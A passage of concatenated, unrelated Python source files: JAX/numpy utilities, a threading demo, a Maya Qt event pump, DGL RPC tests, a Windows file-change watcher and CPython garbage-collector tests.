date_str = datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
namespace_str = f"{prefix}-{date_str}"
return namespace_str
def write_tsv(heads: Sequence[str],
values: Sequence[Any],
filename: str,
print_line: bool = True):
"""Write tsv data to a file."""
assert len(heads) == len(values)
values = [str(x) for x in values]
with open(filename, "a", encoding="utf-8") as fout:
fout.write("\t".join(values) + "\n")
if print_line:
line = ""
for i in range(len(heads)):
line += heads[i] + ": " + values[i] + " "
print(line)
def to_str_round(x: Any, decimal: int = 6):
"""Print a python object but round all floating point numbers."""
if isinstance(x, str):
return x
if isinstance(x, (list, tuple, np.ndarray)):
tmp_str = ", ".join([to_str_round(y, decimal=decimal) for y in x])
return "[" + tmp_str + "]"
if isinstance(x, dict):
return str({k: to_str_round(v, decimal=decimal) for k, v in x.items()})
if isinstance(x, int):
return str(x)
if isinstance(x, float):
format_str = f"%.{decimal}f"
return format_str % x
if x is None:
return str(x)
raise ValueError("Invalid value: " + str(x))
_tic = None
def print_used_time(message: str):
"""Print a message and the elapsed time from the last call."""
global _tic
if message:
print(f" - {message}: {time.time() - _tic:.2f} s")
_tic = time.time()
########################################
##### Other Utilities
########################################
GB = 1 << 30 # Gigabyte
MB = 1 << 20 # Megabyte
def map_to_shape(array_pytree: PyTreeDef):
"""Map a PyTree of jax arrays to their shapes."""
return tree_map(lambda x: getattr(x, "shape", None), array_pytree)
def compute_bytes(pytree: PyTreeDef):
"""Compute the total bytes of arrays in a pytree."""
flatten_args, _ = tree_flatten(pytree)
ret = 0
for x in flatten_args:
if hasattr(x, "shape"):
ret += np.prod(x.shape) * x.dtype.itemsize
return ret
def compute_param_number(pytree: PyTreeDef):
"""Compute the total number of elements in a pytree."""
flatten_args, _ = tree_flatten(pytree)
ret = 0
for x in flatten_args:
if hasattr(x, "shape"):
ret += np.prod(x.shape)
return ret
def get_var_mapping(mapping, var):
"""map the var to a new value if var is Var and in the mapping."""
if isinstance(var, Var) and var in mapping:
return mapping[var]
else:
return var
|
Simple.py
|
from threading import Thread, current_thread, Lock
from time import sleep
report_progress_now = []
progress_lock = Lock()
def check_report_progress(me, id):
global report_progress_now, progress_lock
if report_progress_now[id]:
progress_lock.acquire()
print("{} [{}] is making progress.".format(me.name, me.ident))
report_progress_now[id] = False
progress_lock.release()
def exception_spam(id):
me = current_thread()
while True:
try:
raise Exception()
except Exception:
pass
check_report_progress(me, id)
def sleep_forever(id):
me = current_thread()
while True:
sleep(10)
check_report_progress(me, id)
def busy_loop(id):
me = current_thread()
i = 0
while True:
i = (i % 100000000) + 1
check_report_progress(me, id)
# if i % 10000000 == 0: raise Exception()
if __name__ == '__main__':
num_threads = 10
thread_list = []
thread_fun, main_fun = exception_spam, busy_loop
for i in range(num_threads):
thread_list.append(Thread(target=thread_fun,args=(i,)))
report_progress_now.append(True)
for t in thread_list:
t.start()
report_progress_now.append(True)
me, id = current_thread(), num_threads
while True:
try:
main_fun(id)
except KeyboardInterrupt:
progress_lock.acquire()
for i, _ in enumerate(report_progress_now):
report_progress_now[i] = True
progress_lock.release()
|
pumpThread.py
|
#Creation Date: (July 16, 2007)
#Author: John Creson
import maya.cmds as cmds
import maya.utils as utils
import threading
import time
import sys
from PyQt4 import QtCore, QtGui
pumpedThread = None
app = None
def pumpQt():
global app
def processor():
app.processEvents()
while 1:
time.sleep(0.01)
utils.executeDeferred( processor )
def initializePumpThread():
global pumpedThread
global app
if pumpedThread == None:
app = QtGui.QApplication(sys.argv)
pumpedThread = threading.Thread( target = pumpQt, args = () )
pumpedThread.start()
# Copyright (C) 1997-2014 Autodesk, Inc., and/or its licensors.
# All rights reserved.
#
# The coded instructions, statements, computer programs, and/or related
# material (collectively the "Data") in these files contain unpublished
# information proprietary to Autodesk, Inc. ("Autodesk") and/or its licensors,
# which is protected by U.S. and Canadian federal copyright law and by
# international treaties.
#
# The Data is provided for use exclusively by You. You have the right to use,
# modify, and incorporate this Data into other products for purposes authorized
# by the Autodesk software license agreement, without fee.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. AUTODESK
# DOES NOT MAKE AND HEREBY DISCLAIMS ANY EXPRESS OR IMPLIED WARRANTIES
# INCLUDING, BUT NOT LIMITED TO, THE WARRANTIES OF NON-INFRINGEMENT,
# MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, OR ARISING FROM A COURSE
# OF DEALING, USAGE, OR TRADE PRACTICE. IN NO EVENT WILL AUTODESK AND/OR ITS
# LICENSORS BE LIABLE FOR ANY LOST REVENUES, DATA, OR PROFITS, OR SPECIAL,
# DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES, EVEN IF AUTODESK AND/OR ITS
# LICENSORS HAS BEEN ADVISED OF THE POSSIBILITY OR PROBABILITY OF SUCH DAMAGES.
|
test_rpc.py
|
import os
import time
import socket
import dgl
import backend as F
import unittest, pytest
import multiprocessing as mp
from numpy.testing import assert_array_equal
if os.name != 'nt':
import fcntl
import struct
INTEGER = 2
STR = 'hello world!'
HELLO_SERVICE_ID = 901231
TENSOR = F.zeros((10, 10), F.int64, F.cpu())
def get_local_usable_addr():
"""Get local usable IP and port
Returns
-------
str
IP address, e.g., '192.168.8.12:50051'
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
sock.connect(('10.255.255.255', 1))
ip_addr = sock.getsockname()[0]
except ValueError:
ip_addr = '127.0.0.1'
finally:
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 0))
sock.listen(1)
port = sock.getsockname()[1]
sock.close()
return ip_addr + ' ' + str(port)
def foo(x, y):
assert x == 123
assert y == "abc"
class MyRequest(dgl.distributed.Request):
def __init__(self):
self.x = 123
self.y = "abc"
self.z = F.randn((3, 4))
self.foo = foo
def __getstate__(self):
return self.x, self.y, self.z, self.foo
def __setstate__(self, state):
self.x, self.y, self.z, self.foo = state
def process_request(self, server_state):
pass
class MyResponse(dgl.distributed.Response):
def __init__(self):
self.x = 432
def __getstate__(self):
return self.x
def __setstate__(self, state):
self.x = state
def simple_func(tensor):
return tensor
class HelloResponse(dgl.distributed.Response):
def __init__(self, hello_str, integer, tensor):
self.hello_str = hello_str
self.integer = integer
self.tensor = tensor
def __getstate__(self):
return self.hello_str, self.integer, self.tensor
def __setstate__(self, state):
self.hello_str, self.integer, self.tensor = state
class HelloRequest(dgl.distributed.Request):
def __init__(self, hello_str, integer, tensor, func):
self.hello_str = hello_str
self.integer = integer
self.tensor = tensor
self.func = func
def __getstate__(self):
return self.hello_str, self.integer, self.tensor, self.func
def __setstate__(self, state):
self.hello_str, self.integer, self.tensor, self.func = state
def process_request(self, server_state):
assert self.hello_str == STR
assert self.integer == INTEGER
new_tensor = self.func(self.tensor)
res = HelloResponse(self.hello_str, self.integer, new_tensor)
return res
def start_server(num_clients, ip_config):
print("Sleep 5 seconds to test client re-connect.")
time.sleep(5)
server_state = dgl.distributed.ServerState(None, local_g=None, partition_book=None)
dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
dgl.distributed.start_server(server_id=0,
ip_config=ip_config,
num_clients=num_clients,
server_state=server_state)
def start_client(ip_config):
dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
dgl.distributed.connect_to_server(ip_config=ip_config)
req = HelloRequest(STR, INTEGER, TENSOR, simple_func)
# test send and recv
dgl.distributed.send_request(0, req)
res = dgl.distributed.recv_response()
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test remote_call
target_and_requests = []
for i in range(10):
target_and_requests.append((0, req))
res_list = dgl.distributed.remote_call(target_and_requests)
for res in res_list:
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test send_request_to_machine
dgl.distributed.send_request_to_machine(0, req)
res = dgl.distributed.recv_response()
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test remote_call_to_machine
target_and_requests = []
for i in range(10):
target_and_requests.append((0, req))
res_list = dgl.distributed.remote_call_to_machine(target_and_requests)
for res in res_list:
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# clean up
time.sleep(2)
def test_serialize():
from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload
SERVICE_ID = 12345
dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
req = MyRequest()
data, tensors = serialize_to_payload(req)
req1 = deserialize_from_payload(MyRequest, data, tensors)
req1.foo(req1.x, req1.y)
assert req.x == req1.x
assert req.y == req1.y
assert F.array_equal(req.z, req1.z)
res = MyResponse()
data, tensors = serialize_to_payload(res)
res1 = deserialize_from_payload(MyResponse, data, tensors)
assert res.x == res1.x
def test_rpc_msg():
from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload, RPCMessage
SERVICE_ID = 32452
dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
req = MyRequest()
data, tensors = serialize_to_payload(req)
rpcmsg = RPCMessage(SERVICE_ID, 23, 0, 1, data, tensors)
assert rpcmsg.service_id == SERVICE_ID
assert rpcmsg.msg_seq == 23
assert rpcmsg.client_id == 0
assert rpcmsg.server_id == 1
assert len(rpcmsg.data) == len(data)
assert len(rpcmsg.tensors) == 1
assert F.array_equal(rpcmsg.tensors[0], req.z)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_rpc():
ip_config = open("rpc_ip_config.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('%s 1\n' % ip_addr)
ip_config.close()
ctx = mp.get_context('spawn')
pserver = ctx.Process(target=start_server, args=(1, "rpc_ip_config.txt"))
pclient = ctx.Process(target=start_client, args=("rpc_ip_config.txt",))
pserver.start()
time.sleep(1)
pclient.start()
pserver.join()
pclient.join()
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_multi_client():
ip_config = open("rpc_ip_config_mul_client.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('%s 1\n' % ip_addr)
ip_config.close()
ctx = mp.get_context('spawn')
pserver = ctx.Process(target=start_server, args=(10, "rpc_ip_config_mul_client.txt"))
pclient_list = []
for i in range(10):
pclient = ctx.Process(target=start_client, args=("rpc_ip_config_mul_client.txt",))
pclient_list.append(pclient)
pserver.start()
for i in range(10):
pclient_list[i].start()
for i in range(10):
pclient_list[i].join()
pserver.join()
if __name__ == '__main__':
test_serialize()
test_rpc_msg()
test_rpc()
test_multi_client()
|
watchdog.py
|
# Thanks to Tim Golden for the excellent examples of win32 package
import os
import sys
import threading
import re
import win32file
import win32con
import win32api
import datetime
import configparser
class Watcher(threading.Thread):
def __init__(self, path_to_watch):
self.run = True
self.path_to_watch = path_to_watch
self.config_file = configparser.ConfigParser()
self.ACTIONS = {
1 : "Created",
2 : "Deleted",
3 : "Updated",
4 : "Renamed from something",
5 : "Renamed to something"
}
def command(self, cmd):
cmd_list = cmd.split(" ")
if cmd_list[0].lower() == 'kill':
print(f"Kill command issued for {self.path_to_watch}")
self.run = False
# TODO: DIC and separate function for each separate setting
if cmd_list[0].lower() == 'ignore':
if len(cmd_list) < 3 :
print("Missing required arguments.")
return
if not cmd_list[3].isdecimal():
print("Ignore value most of 0 or 1")
return
self.setConfig(cmd_list[1], cmd_list[2])
def ignoreRegexCreator(self):
regComp = 'a^'
if int(self.config['IGNORE_BROWSER']) == 1:
browsers = {
'firefox': r"(\\Users\\.*\\AppData\\.*\\Mozilla)",
'brave': r"(\\Users\\.*\\AppData\\.*\\BraveSoftware)",
'edge': r"(\\Users\\.*\AppData\.*\\Microsoft\\Edge)"
}
regComp = '|'.join(browsers.values())
self.regex = re.compile(regComp, re.IGNORECASE)
def getConfig(self):
self.config_file.read('settings.ini')
if not hasattr(self, 'config'):
self.config = {}
if 'IGNORE' in self.config_file:
self.config['IGNORE_BROWSER'] = self.config_file['IGNORE'].getint('IGNORE_BROWSER', 1)
else:
self.config['IGNORE_BROWSER'] = 1
self.config_file['IGNORE'] = {}
self.config_file['IGNORE']['IGNORE_BROWSER'] = '1'
# print(f"Configs:\nIgnore Browsers:{self.config['IGNORE_BROWSER']}")
self.ignoreRegexCreator()
with open('settings.ini', 'w') as configfile:
self.config_file.write(configfile)
def setConfig(self, attr, value):
if attr == 'browser':
self.config['IGNORE_BROWSER'] = value
print(f"Browser ignore set to: {self.config['IGNORE_BROWSER']}")
self.ignoreRegexCreator()
return True
def start(self):
print(f"Starting watcher for directory: {self.path_to_watch}...")
self.getConfig()
FILE_LIST_DIRECTORY = 0x0001
hDir = win32file.CreateFile (
self.path_to_watch,
FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
None,
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS,
None
)
while self.run:
results = win32file.ReadDirectoryChangesW(
hDir,
1024,
True,
win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
win32con.FILE_NOTIFY_CHANGE_DIR_NAME |
win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
win32con.FILE_NOTIFY_CHANGE_SIZE |
win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
win32con.FILE_NOTIFY_CHANGE_SECURITY,
None,
None
)
for action, file in results:
full_filename = os.path.join(self.path_to_watch, file)
if not re.search(self.regex, full_filename):
try:
stats = os.stat(full_filename)
size = stats.st_size / (1024*1024)
except (FileNotFoundError, PermissionError):
size = 0
s = f"{datetime.datetime.now()} | {self.ACTIONS.get(action, 'Unknown')}-->{full_filename} {size:.2f}mb"
print(s)
def get_all_drives():
drives = win32api.GetLogicalDriveStrings()
drives = [d for d in drives.split('\000') if os.path.isdir(d)]
return drives
def main():
ptw = input("Enter a path ('ALL' to watch all drives/ seperate paths with space for multiple paths):")
print(ptw.split(" "))
path_to_watch = [os.path.abspath(path) for path in ptw.split(' ')]
if ptw.lower() != 'all':
while 1:
fl = True
for path in path_to_watch:
if not os.path.isdir(path):
print(f"{path_to_watch} is not a valid directory")
path_to_watch = input("Please enter a valid directory to watch:")
if path_to_watch == 'all':
ptw = 'all'
break
path_to_watch = [os.path.abspath(path) for path in path_to_watch.split(' ')]
fl = False
if fl: break
watchers = []
if ptw.lower() == 'all':
drives = get_all_drives()
for drive in drives:
watchers.append(Watcher(drive))
else:
for path in path_to_watch:
watchers.append(Watcher(path))
functions = [watcher.start for watcher in watchers]
threads = list()
for f in functions:
x = threading.Thread(target=f)
threads.append(x)
x.start()
while 1:
try:
cmd = input("Enter action:")
if cmd == 'kill':
os._exit(1)
for watcher in watchers:
watcher.command(cmd)
except (KeyboardInterrupt, SystemExit):
sys.exit()
except Exception as e:
print(e)
pass
if __name__ == '__main__':
main()
|
test_gc.py
|
import unittest
from test.support import (verbose, refcount_test, run_unittest,
strip_python_stderr, cpython_only, start_threads,
temp_dir, requires_type_collecting, TESTFN, unlink,
import_module)
from test.support.script_helper import assert_python_ok, make_script
import gc
import sys
import sysconfig
import textwrap
import threading
import time
import weakref
try:
from _testcapi import with_tp_del
except ImportError:
def with_tp_del(cls):
class C(object):
def __new__(cls, *args, **kwargs):
raise TypeError('requires _testcapi.with_tp_del')
return C
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
def __init__(self, i):
self.i = i
self.loop = self
class GC_Detector(object):
# Create an instance I. Then gc hasn't happened again so long as
# I.gc_happened is false.
def __init__(self):
self.gc_happened = False
def it_happened(ignored):
self.gc_happened = True
# Create a piece of cyclic trash that triggers it_happened when
# gc collects it.
self.wr = weakref.ref(C1055820(666), it_happened)
@with_tp_del
class Uncollectable(object):
"""Create a reference cycle with multiple __del__ methods.
An object in a reference cycle will never have zero references,
and so must be garbage collected. If one or more objects in the
cycle have __del__ methods, the gc refuses to guess an order,
and leaves the cycle uncollected."""
def __init__(self, partner=None):
if partner is None:
self.partner = Uncollectable(partner=self)
else:
self.partner = partner
def __tp_del__(self):
pass
if sysconfig.get_config_vars().get('PY_CFLAGS', ''):
BUILD_WITH_NDEBUG = ('-DNDEBUG' in sysconfig.get_config_vars()['PY_CFLAGS'])
else:
# Usually, sys.gettotalrefcount() is only present if Python has been
# compiled in debug mode. If it's missing, expect that Python has
# been released in release mode: with NDEBUG defined.
BUILD_WITH_NDEBUG = (not hasattr(sys, 'gettotalrefcount'))
### Tests
###############################################################################
class GCTests(unittest.TestCase):
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
@requires_type_collecting
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
self.assertEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
@cpython_only
def test_legacy_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A:
def __tp_del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
@cpython_only
def test_legacy_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A(object):
def __tp_del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec("def f(): pass\n", d)
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
@refcount_test
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
self.assertEqual(gc.collect(), 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
def test_del(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
def test_del_newclass(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example, disposed tuples are not freed, but reused.
# To minimize variations, though, we first store the get_count() results
# and check them at the end.
@refcount_test
def test_get_count(self):
gc.collect()
a, b, c = gc.get_count()
x = []
d, e, f = gc.get_count()
self.assertEqual((b, c), (0, 0))
self.assertEqual((e, f), (0, 0))
# This is less fragile than asserting that a equals 0.
self.assertLess(a, 5)
# Between the two calls to get_count(), at least one object was
# created (the list).
self.assertGreater(d, a)
@refcount_test
def test_collect_generations(self):
gc.collect()
# This object will "trickle" into generation N + 1 after
# each call to collect(N)
x = []
gc.collect(0)
# x is now in gen 1
a, b, c = gc.get_count()
gc.collect(1)
# x is now in gen 2
d, e, f = gc.get_count()
gc.collect(2)
# x is now in gen 3
g, h, i = gc.get_count()
# We don't check a, d, g since their exact values depends on
# internal implementation details of the interpreter.
self.assertEqual((b, c), (1, 0))
self.assertEqual((e, f), (0, 1))
self.assertEqual((h, i), (0, 0))
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
gc.disable()
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
try:
exit = []
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
with start_threads(threads, lambda: exit.append(1)):
time.sleep(1.0)
finally:
sys.setswitchinterval(old_switchinterval)
gc.collect()
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = gc.get_referents(alist)
got.sort()
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + list(range(5)))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked(b"a"))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(bytearray(b"a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class UserClass:
pass
class UserInt(int):
pass
# Base class is object; no extra fields.
class UserClassSlots:
__slots__ = ()
# Base class is fixed size larger than object; no extra fields.
class UserFloatSlots(float):
__slots__ = ()
# Base class is variable size; no extra fields.
class UserIntSlots(int):
__slots__ = ()
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(UserClass))
self.assertTrue(gc.is_tracked(UserClass()))
self.assertTrue(gc.is_tracked(UserInt()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
self.assertFalse(gc.is_tracked(UserClassSlots()))
self.assertFalse(gc.is_tracked(UserFloatSlots()))
self.assertFalse(gc.is_tracked(UserIntSlots()))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
def test_bug21435(self):
# This is a poor test - its only virtue is that it happened to
# segfault on Tim's Windows box before the patch for 21435 was
# applied. That's a nasty bug relying on specific pieces of cyclic
# trash appearing in exactly the right order in finalize_garbage()'s
# input list.
# But there's no reliable way to force that order from Python code,
# so over time chances are good this test won't really be testing much
# of anything anymore. Still, if it blows up, there's _some_
# problem ;-)
gc.collect()
class A:
pass
class B:
def __init__(self, x):
self.x = x
def __del__(self):
self.attr = None
def do_work():
a = A()
b = B(A())
a.attr = b
b.attr = a
do_work()
gc.collect() # this blows up (bad C pointer) when it fails
@cpython_only
def test_garbage_at_shutdown(self):
import subprocess
code = """if 1:
import gc
import _testcapi
@_testcapi.with_tp_del
class X:
def __init__(self, name):
self.name = name
def __repr__(self):
return "<X %%r>" %% self.name
def __tp_del__(self):
pass
x = X('first')
x.x = x
x.y = X('second')
del x
gc.set_debug(%s)
"""
def run_command(code):
p = subprocess.Popen([sys.executable, "-Wd", "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
self.assertEqual(p.returncode, 0)
self.assertEqual(stdout.strip(), b"")
return strip_python_stderr(stderr)
stderr = run_command(code % "0")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown; use", stderr)
self.assertNotIn(b"<X 'first'>", stderr)
# With DEBUG_UNCOLLECTABLE, the garbage list gets printed
stderr = run_command(code % "gc.DEBUG_UNCOLLECTABLE")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown", stderr)
self.assertTrue(
(b"[<X 'first'>, <X 'second'>]" in stderr) or
(b"[<X 'second'>, <X 'first'>]" in stderr), stderr)
# With DEBUG_SAVEALL, no additional message should get printed
# (because gc.garbage also contains normally reclaimable cyclic
# references, and its elements get printed at runtime anyway).
stderr = run_command(code % "gc.DEBUG_SAVEALL")
self.assertNotIn(b"uncollectable objects at shutdown", stderr)
